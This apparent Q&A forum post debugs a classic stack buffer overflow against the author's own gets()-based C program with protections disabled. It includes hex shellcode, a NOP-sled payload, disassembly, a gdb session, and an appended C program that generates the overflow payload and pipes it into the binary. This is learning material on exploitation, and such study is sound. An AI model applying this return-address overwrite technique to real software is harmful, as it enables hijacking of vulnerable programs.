Problems exploiting a buffer overflow
<p>Some days ago I wrote a simple program to test buffer overflow exploitation on an x86 system. To keep it simple I disabled ASLR and NX, so there is no protection that could cause weird behaviour.</p>
<p>This is my C code to exploit:</p>
<pre><code>#include &lt;stdio.h&gt;

void read_txt(){
    char txt[64];
    printf("Write something:");
    gets(txt);          /* no bounds check: this is the overflow */
}

int main(){
    read_txt();
    return 0;
}
</code></pre>
<p>I also wrote my own shellcode, which just prints a string. As far as I know the payload should be something like this: fill the buffer with NOP instructions + shellcode, add 0x41414141 (AAAA) to overwrite the EBP register, and finally overwrite the return address with an address pointing to the middle of the NOPs.</p>
<p>Actually it does not work that way, and my payload is as follows:</p>
<pre><code>[1-\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x20\x3b\x29\x20\x68\x68\x73\x65\x63\x68\x20\x48\x69\x67\x68\x48\x6f\x6c\x61\x89\xe1\xb2\x0f\xcd\x80\xb0\x01\x31\xdb][2-\x41\x41\x41\x41][3-\x89\xf4\xff\xbf][4-\x89\xf4\xff\xbf]

1- NOPs + shellcode = 60 bytes
2- AAAA = 4 bytes (padding to fill the buffer; if NOPs + shellcode fill 64 bytes it does not work)
3- Address that overrides EBP (in the middle of the NOPs)
4- Overrides the return address
</code></pre>
<p>This exploit works in gdb but fails if I pass the payload directly to the program, and I think the problem is that just before the program executes the gets() function the disassembler shows the <strong>leave</strong> instruction, which points esp to ebp and causes an error.</p>
<p>This is the disassembly of the read_txt() function:</p>
<pre><code>0x0804844c &lt;+0&gt;:   push   %ebp
0x0804844d &lt;+1&gt;:   mov    %esp,%ebp
0x0804844f &lt;+3&gt;:   sub    $0x44,%esp
0x08048452 &lt;+6&gt;:   movl   $0x8048510,(%esp)
0x08048459 &lt;+13&gt;:  call   0x8048320 &lt;printf@plt&gt;
0x0804845e &lt;+18&gt;:  lea    -0x40(%ebp),%eax
0x08048461 &lt;+21&gt;:  mov    %eax,(%esp)
0x08048464 &lt;+24&gt;:  call   0x8048330 &lt;gets@plt&gt;
0x08048469 &lt;+29&gt;:  leave
0x0804846a &lt;+30&gt;:  ret
</code></pre>
<p>And this is the execution of the exploit in gdb:</p>
<pre><code>(gdb) x/20x $esp
0xbffff47c: 0xbffff480 0x90909090 0x90909090 0x90909090
0xbffff48c: 0x90909090 0xc0319090 0xc931db31 0x04b0d231
0xbffff49c: 0x206801b3 0x6820293b 0x63657368 0x69482068
0xbffff4ac: 0x6f486867 0xe189616c 0x80cd0fb2 0xdb3101b0
0xbffff4bc: 0x41414141 0xbffff489 0xbffff489 0xbffff500
(gdb) s
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x90909090: I/O Error.

0xbffff489 in ?? ()
(gdb) c
Continuing.
Shellcode Executed
Program received signal SIGSEGV, Segmentation fault.
0xbffff4b9 in ?? ()
(gdb)
</code></pre>
<p>Notice that EBP points to 0x90909090 because it has the same address that overrides the return address, and also notice the string <strong>Shellcode Executed</strong>, which comes from the shellcode included in the payload.</p>
<p>My question is: where could I point EBP to avoid this problem before pointing the return address to the NOP slide? Also, as a secondary question, why can't I fill the 64-byte buffer with NOPs + shellcode?</p>
<p>Regards.</p>
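<p>As an added example (this is not code from the original post), the following C program builds the 72-byte payload for the read_txt() frame that the disassembly above shows (64-byte buffer at ebp-0x40, then the saved EBP, then the return address) and writes it to stdout so it can be piped into the vulnerable binary. It also works out where the shellcode's own four push instructions land: after leave/ret, ESP sits just past the return-address slot, and each push writes four bytes below ESP, so with 18 NOPs + 42 shellcode bytes the pushes overwrite the last four shellcode bytes (the ones after the int $0x80, so the write still happens and the crash comes afterwards), and with the buffer filled to 64 bytes they overwrite the int $0x80 itself before it runs. The buffer address 0xbffff480 is taken from the gdb session and is an assumption: outside gdb the stack usually sits elsewhere, because gdb adds environment variables and a full argv[0], so that value has to be re-derived for a plain run. The helper names (build_payload, clobbered_shellcode_bytes, syscall_survives, payload_has_no_newline) are mine.</p>

```c
/* Added example, not from the original post. Frame layout from the question's
 * disassembly: sub $0x44,%esp / lea -0x40(%ebp),%eax => 64-byte buffer at
 * ebp-0x40, then saved EBP (4), then return address (4). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE       64u
#define SAVED_EBP_SIZE  4u
#define RET_SIZE        4u
#define PAYLOAD_SIZE   (BUF_SIZE + SAVED_EBP_SIZE + RET_SIZE)   /* 72 bytes */

/* Shellcode bytes copied from the question (42 bytes). Four 5-byte pushes at
 * offsets 12..31 write 16 bytes below ESP; int $0x80 at offset 36 issues the
 * write(2); the trailing mov $1,%al / xor %ebx,%ebx prepare exit(0) but are
 * not followed by a second int $0x80, so execution falls off the end. */
static const unsigned char shellcode[] = {
    0x31, 0xc0, 0x31, 0xdb, 0x31, 0xc9, 0x31, 0xd2, 0xb0, 0x04, 0xb3, 0x01,
    0x68, 0x20, 0x3b, 0x29, 0x20,              /* push (5 bytes) */
    0x68, 0x68, 0x73, 0x65, 0x63,              /* push */
    0x68, 0x20, 0x48, 0x69, 0x67,              /* push */
    0x68, 0x48, 0x6f, 0x6c, 0x61,              /* push */
    0x89, 0xe1, 0xb2, 0x0f, 0xcd, 0x80,        /* mov %esp,%ecx; mov $15,%dl; int $0x80 */
    0xb0, 0x01, 0x31, 0xdb                     /* mov $1,%al; xor %ebx,%ebx */
};
#define SC_PUSH_BYTES  16u   /* 4 pushes x 4 bytes written below ESP */
#define SC_SYSCALL_OFF 36u   /* offset of int $0x80 inside the shellcode */

/* Little-endian store of a 32-bit address, as the stack expects it. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);        p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff); p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Buffer offset of the first byte the shellcode's pushes overwrite: after
 * leave/ret ESP = buffer + PAYLOAD_SIZE, and pushes grow downward from there. */
static size_t first_clobbered_offset(size_t push_bytes)
{
    return PAYLOAD_SIZE - push_bytes;
}

/* Shellcode bytes overwritten when the shellcode occupies buffer offsets
 * [nop_len, nop_len + sc_len). 0 means the pushes never reach it. */
static size_t clobbered_shellcode_bytes(size_t nop_len, size_t sc_len, size_t push_bytes)
{
    size_t sc_end = nop_len + sc_len, start = first_clobbered_offset(push_bytes);
    return sc_end > start ? sc_end - start : 0;
}

/* 1 if the 2-byte int $0x80 at shellcode offset syscall_off lies entirely
 * below the clobbered region, i.e. it is still intact when it executes. */
static int syscall_survives(size_t nop_len, size_t syscall_off, size_t push_bytes)
{
    return nop_len + syscall_off + 2 <= first_clobbered_offset(push_bytes);
}

/* gets() stops at '\n', so a payload byte 0x0a would truncate the overflow. */
static int payload_has_no_newline(const unsigned char *p, size_t n)
{
    return memchr(p, '\n', n) == NULL;
}

/* out[] = nop_len NOPs | shellcode | 'A' padding to 64 | saved EBP | return
 * address, the last two pointing into the middle of the sled. Returns the
 * payload length, or 0 if the sled + shellcode do not fit in the buffer. */
static size_t build_payload(unsigned char *out, size_t out_len, uint32_t buf_addr,
                            const unsigned char *sc, size_t sc_len, size_t nop_len)
{
    if (out_len < PAYLOAD_SIZE || nop_len + sc_len > BUF_SIZE)
        return 0;
    uint32_t ret = buf_addr + (uint32_t)(nop_len / 2);
    size_t pos = 0;
    memset(out + pos, 0x90, nop_len);        pos += nop_len;
    memcpy(out + pos, sc, sc_len);           pos += sc_len;
    memset(out + pos, 'A', BUF_SIZE - pos);  pos  = BUF_SIZE;
    /* Saved-EBP slot: this shellcode never uses EBP, so any value works; the
     * sled address is used only so the slot is easy to spot in a stack dump. */
    put_le32(out + pos, ret);                pos += SAVED_EBP_SIZE;
    put_le32(out + pos, ret);                pos += RET_SIZE;
    return pos;
}

int main(void)
{
    unsigned char payload[PAYLOAD_SIZE];
    const size_t nop_len = 18;   /* 18 NOPs + 42 shellcode bytes = 60, as in the question */
    /* 0xbffff480: buffer address seen in gdb (assumption; shifts in a plain run). */
    size_t n = build_payload(payload, sizeof payload, 0xbffff480u,
                             shellcode, sizeof shellcode, nop_len);
    if (n == 0 || !payload_has_no_newline(payload, n)) {
        fprintf(stderr, "payload not usable with gets()\n");
        return 1;
    }
    fprintf(stderr, "pushes overwrite %zu shellcode byte(s) from buffer offset %zu; int $0x80 %s\n",
            clobbered_shellcode_bytes(nop_len, sizeof shellcode, SC_PUSH_BYTES),
            first_clobbered_offset(SC_PUSH_BYTES),
            syscall_survives(nop_len, SC_SYSCALL_OFF, SC_PUSH_BYTES) ? "intact" : "clobbered");
    fwrite(payload, 1, n, stdout);
    fputc('\n', stdout);         /* terminates gets() */
    return 0;
}
```

<p>Usage: compile with <code>gcc -o gen gen.c</code> and run <code>./gen | ./vuln</code>; the diagnostic on stderr reports how far the shellcode's pushes reach into the buffer. Raising <code>nop_len</code> to 22 fills the buffer to 64 bytes and the check reports the int $0x80 as clobbered, which is the case the question describes as not working.</p>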